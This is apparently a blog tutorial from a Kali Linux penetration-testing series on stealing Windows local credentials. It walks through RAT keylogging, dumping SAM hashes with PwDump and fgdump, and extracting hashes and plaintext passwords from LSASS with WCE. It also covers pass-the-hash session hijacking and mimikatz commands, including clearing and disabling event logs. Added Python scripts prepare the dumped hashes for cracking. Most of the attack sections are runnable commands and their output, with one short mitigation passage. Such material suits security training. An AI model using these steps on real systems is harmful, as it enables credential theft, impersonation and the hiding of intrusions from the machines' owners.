
Kali Linux Penetration Testing 045: Reading Windows Local Passwords

This post records the process of learning Kali Linux 2018.1 and using it for penetration testing; the material follows the 安全牛課堂 course《Kali Linux 滲透測試》.
1. Packet capture and sniffing
2. Keylogging local passwords
3. Viewing locally cached passwords
4. WCE (WINDOWS CREDENTIAL EDITOR)
5. fgdump
6. mimikatz

1. Packet capture and sniffing

  1. Windows

    • Wireshark
    • Omnipeek
    • Commview
    • Sniffpass: captures only the packets that carry passwords (cleartext protocols only)
  2. Linux

    • Tcpdump
    • Wireshark
    • Dsniff: captures only the packets that carry passwords (cleartext protocols only)

2. Keylogging local passwords

  • A RAT such as DarkComet can be used

    Once the target host is under control, its keystrokes can be logged, which captures passwords as they are typed

3. Viewing locally cached passwords

  1. View passwords saved in the browser

  2. Use Pwdump to read the Windows local logon password hashes

    • Windows stores local account password hashes (not the passwords themselves) in C:\Windows\System32\config\SAM
    • Pwdump can be found in Kali under /usr/share/windows-binaries/fgdump/; it must be run with administrator privileges on the target
    • Add a user

      C:\Documents and Settings\kevin>net user user2 123456 /add
      C:\Documents and Settings\kevin>net user
          User accounts for \\ICST-WINATT
          -------------------------------------------------------------
          Administrator            Guest                    HelpAssistant
          kevin                    SUPPORT_388945a0         test
          user1                    user2
      C:\Documents and Settings\kevin>cd \
      C:\>PwDump.exe localhost
          Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
          Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
          HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73:::
          kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
          SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
          test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
          user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
          user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Completed.
      # Result: each line is user:RID:LMhash:NThash:::, so the first hash is the LM hash and the second the NTLM (NT) hash.
      # "NO PASSWORD****" means that hash is not stored. kevin, test, user1 and user2 show the same pair, i.e. the same password (123456).
      
    • The output can be saved to a file and cracked in Kali (for example with john or hashcat)
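Before throwing a dump at a cracker it pays to triage it: which accounts have no password, which still have an LM hash (trivially crackable), which share a hash. The Python below is an added example, not part of the original post or of the PwDump tool; its sample input is the PwDump output above, copied verbatim, and `parse_pwdump` / `triage` / `to_hashcat` are names chosen here.

```python
from collections import defaultdict

# LM hash of an empty (or absent) password: both 7-byte DES halves equal AAD3B435B51404EE.
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_LM_HALF = EMPTY_LM[16:]
# NT hash (MD4 of the UTF-16LE password) of an empty password.
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# Constructed sample input: the PwDump.exe output from the walkthrough above,
# including the "Completed." that PwDump appended to its last line.
SAMPLE_DUMP = """\
Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73:::
kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Completed.
"""


def _norm(h):
    """Upper-case a 32-hex-digit hash; PwDump's 'NO PASSWORD****' marker becomes None."""
    h = h.strip().upper()
    return h if len(h) == 32 and all(c in "0123456789ABCDEF" for c in h) else None


def parse_pwdump(text):
    """Parse user:RID:LM:NT::: lines into (user, rid, lm, nt) tuples."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # blank line or trailing junk, not a record
        user, rid, lm, nt = parts[:4]
        records.append((user, int(rid), _norm(lm), _norm(nt)))
    return records


def triage(records):
    """Findings that decide the cracking plan before any hash is fed to john/hashcat."""
    # No NT hash, or the NT hash of "": the account has no password at all.
    blank = [u for u, _, lm, nt in records if nt in (None, EMPTY_NT)]
    # An LM hash is stored: crack it with hashcat -m 3000 (case-insensitive, 2 x 7 chars).
    lm_present = [u for u, _, lm, nt in records if lm not in (None, EMPTY_LM)]
    # Second LM half is the empty-block constant, so the password is at most 7 characters.
    short = [u for u, _, lm, nt in records
             if lm not in (None, EMPTY_LM) and lm.endswith(EMPTY_LM_HALF)]
    # Identical NT hashes mean identical passwords: crack one, get them all.
    by_nt = defaultdict(list)
    for u, _, lm, nt in records:
        if nt not in (None, EMPTY_NT):
            by_nt[nt].append(u)
    shared = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return {"blank": blank, "lm_present": lm_present, "short": short, "shared": shared}


def to_hashcat(records):
    """NT hashes as user:hash lines for `hashcat -m 1000 --username`."""
    return [f"{u}:{nt}" for u, _, lm, nt in records if nt and nt != EMPTY_NT]


if __name__ == "__main__":
    recs = parse_pwdump(SAMPLE_DUMP)
    for key, value in triage(recs).items():
        print(f"{key}: {value}")
    print("\n".join(to_hashcat(recs)))
```

On the sample, Guest is reported as blank, six accounts still carry LM hashes, the four 123456 accounts are flagged both as sharing one NT hash and as having passwords of at most 7 characters (their second LM half is the empty-block constant), and seven user:hash lines are emitted for hashcat.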

4. WCE (WINDOWS CREDENTIAL EDITOR)

  1. Windows authentication process

  2. WCE (WINDOWS CREDENTIAL EDITOR)

    • After logon, Windows keeps each session's credentials in the memory of the LSASS process (the NTLM hashes, and on older systems a plaintext copy held by the WDigest package); they are protected only by process isolation, so any administrator can read them
    • Administrator privileges are required
    • The tool is kept in Kali at /usr/share/wce/wce-universal # the universal build automatically detects 32-bit and 64-bit
    • Log several users into the target host, so there are multiple sessions to enumerate

    • Enumerate logon sessions and their NTLM credentials (LUID:user:domain:LMhash:NThash)

      C:\>wce-universal.exe -lv
          0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
          # Same hashes as C:\>PwDump.exe localhost; the last line is the computer account, whose LM/NT pair is the empty-password pair
      
    • Refresh the session list every 5 seconds

      C:\>wce-universal.exe -r

    • Delete the credentials of a logon session, by LUID

      C:\>wce-universal.exe -d 0020B19D
      C:\>wce-universal.exe -lv
          001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
      
    • Compute the LM and NT hashes of a given password (handy for building the -s argument below)

      C:\>wce-universal.exe -g passwd
          Password:   passwd
          Hashes:     91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DEC
      
    • Read the plaintext passwords held in LSASS memory (via WDigest)

      C:\>wce-universal.exe -w
          user1\ICST-WINATT:123456
          user2\ICST-WINATT:123456
          test\ICST-WINATT:123456
          kevin\ICST-WINATT:123456
          NETWORK SERVICE\MSHOME:
      
      C:\>net user user1 111222
          The command completed successfully.
      C:\>wce-universal.exe -w
          user1\ICST-WINATT:123456
          user2\ICST-WINATT:123456
          test\ICST-WINATT:123456
          kevin\ICST-WINATT:123456
          NETWORK SERVICE\MSHOME:
      # The credentials cached in LSASS belong to the existing logon session and are not updated by a password change; the new password only shows up after user1 logs on again
      
    • Modify a session's credentials by LUID (pass-the-hash: give session 001E5D92 kevin's username and hashes, so that session authenticates as kevin)

      C:\>wce-universal.exe -lv
          001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
      C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          Changing NTLM credentials of logon session 001E5D92h to:
          Username: kevin
          domain: ICST-WINATT
          LMHash: 44EFCE164AB921CAAAD3B435B51404EE
          NTHash: 32ED87BDB5FDC5E9CBA88547376818D4
          NTLM credentials successfully changed!
      C:\>wce-universal.exe -lv
          001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
          000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
      
    • Windows 7 and earlier are vulnerable to WCE by default (plaintext via WDigest as well as the NTLM hashes); Windows 8.1 / Server 2012 R2 no longer keep the plaintext copy by default

      Mitigation: edit the registry

      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
      

      Remove wdigest from that value and reboot the computer

      Caveat: on Windows 7 / Server 2008 R2 the supported fix is to install update KB2871997 and then set the DWORD UseLogonCredential to 0 under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. Either change only removes the plaintext copy; the NTLM hashes stay in LSASS, so -lv and the -s pass-the-hash trick above keep working. Limiting who holds local administrator rights is what actually stops WCE
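To see what `-g`, `-w` and `-lv` are reporting, it helps to compute the NT hash yourself. The Python below is an added example, not from the original post and not part of WCE: it implements MD4 in pure Python (hashlib's md4 is disabled on most current OpenSSL builds) to reproduce the NT half of `wce -g`, checks that the `-w` plaintexts really hash to the `-lv` session hashes, and shows why `-w` still reported 123456 for user1 after `net user user1 111222`. The session lines are copied from the `-lv` output above; the LM half is not computed (it needs DES), and the function names are chosen here.

```python
import struct


def _md4(data: bytes) -> bytes:
    """Minimal RFC 1320 MD4: the NT hash is MD4 over the UTF-16LE password."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as little-endian 64-bit.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rotl((a + F(b, c, d) + X[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c  # rotate registers: abcd, dabc, cdab, bcda
        for i in range(16):  # round 2, word order 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3, word order 0,8,4,12,2,10,...
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), printed upper-case like WCE and PwDump do."""
    return _md4(password.encode("utf-16le")).hex().upper()


# Constructed sample: the logon sessions enumerated above with `wce -lv`
# (LUID:user:domain:LM:NT) and the plaintexts `wce -w` reported for them.
SESSIONS = """\
0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
"""
PLAINTEXT = {"user1": "123456", "user2": "123456", "kevin": "123456", "ICST-WINATT$": ""}


def parse_sessions(text):
    """Map user -> {luid, domain, lm, nt} from `wce -lv` lines."""
    out = {}
    for line in text.splitlines():
        luid, user, domain, lm, nt = line.strip().split(":")
        out[user] = {"luid": luid, "domain": domain, "lm": lm.upper(), "nt": nt.upper()}
    return out


def verify_plaintext(sessions, plaintext):
    """Does each plaintext from `wce -w` hash to the NT hash `wce -lv` shows for that session?"""
    return {u: nt_hash(plaintext[u]) == s["nt"] for u, s in sessions.items() if u in plaintext}


def session_is_stale(sessions, user, new_password):
    """True when the session still holds the old password's hash after `net user <user> <new>`:
    LSASS replaces the cached credential only when the user logs on again."""
    return nt_hash(new_password) != sessions[user]["nt"]


if __name__ == "__main__":
    sess = parse_sessions(SESSIONS)
    print("nt_hash('123456') =", nt_hash("123456"))
    print(verify_plaintext(sess, PLAINTEXT))
    print("user1 session stale after net user user1 111222:", session_is_stale(sess, "user1", "111222"))
```

The empty password hashes to 31D6CFE0D16AE931B73C59D7E0C089C0, which is exactly what the computer account ICST-WINATT$ shows in `-lv`; 123456 hashes to 32ED87BDB5FDC5E9CBA88547376818D4, the value shared by the four user sessions. After the `net user user1 111222` change, the hash of 111222 no longer matches what the session holds, which is why `-w` kept showing 123456.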

5. fgdump

  1. PwDump localhost

    Location: in Kali, Pwdump can be found under /usr/share/windows-binaries/fgdump/

  2. fgdump

    Location: in Kali, fgdump can be found under /usr/share/windows-binaries/fgdump/
    Copy it to the WinXP host and double-click it or run fgdump.exe from the command line; it automatically writes three files: a .pwdump file with the SAM hashes (same format as PwDump), a .cachedump file with cached domain logon credentials, and a log file

6. mimikatz

  • Path in Kali: /usr/share/mimikatz; copy the Win32 directory to the Windows host (x64 for 64-bit hosts)

    C:\Win32>mimikatz.exe
    List the modules with `::` (and a module's commands with `<module>::`):
    mimikatz # ::
                standard  -  Standard module  [Basic commands (does not require module name)]
                  crypto  -  Crypto Module
                sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
                kerberos  -  Kerberos package module  []
               privilege  -  Privilege module
                 process  -  Process module
                 service  -  Service module
                 lsadump  -  LsaDump module
                      ts  -  Terminal Server module
                   event  -  Event module
                    misc  -  Miscellaneous module
                   token  -  Token manipulation module
                   vault  -  Windows Vault/Credential module
             minesweeper  -  MineSweeper module
                     net  -
                   dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]
               busylight  -  BusyLight Module
                  sysenv  -  System Environment Value module
                     sid  -  Security Identifiers module
                     iis  -  IIS XML Config module
                     rpc  -  RPC control of mimikatz            
    mimikatz # privilege::
                Module :        privilege
                Full name :     Privilege module
    
                   debug  -  Ask debug privilege
                  driver  -  Ask load driver privilege
                security  -  Ask security privilege
                     tcb  -  Ask tcb privilege
                  backup  -  Ask backup privilege
                 restore  -  Ask restore privilege
                  sysenv  -  Ask system environment privilege
                      id  -  Ask a privilege by its id
                    name  -  Ask a privilege by its name
    mimikatz # privilege::debug            # obtain SeDebugPrivilege; required before touching LSASS
    mimikatz # sekurlsa::                  # list the sekurlsa module's commands
    mimikatz # sekurlsa::logonPasswords    # dump the credentials of every logon session from LSASS (NTLM hashes, WDigest plaintext, Kerberos)
    mimikatz # sekurlsa::wdigest           # only the WDigest entries (plaintext on Win7 and earlier unless patched)
    mimikatz # process::list               # list processes
    mimikatz # lsadump::sam                # dump the hashes from the SAM hive; needs a SYSTEM token (token::elevate first)
    mimikatz # lsadump::cache              # dump cached domain logon credentials (MSCache)
    mimikatz # ts::multirdp                # patch termsrv so several RDP sessions can run at once
    mimikatz # event::clear                # clear the event log
    mimikatz # event::drop                 # patch the event service so new events are no longer written
    mimikatz # misc::regedit               # launch regedit
    mimikatz # token::whoami               # show the current token (user, SID, privileges)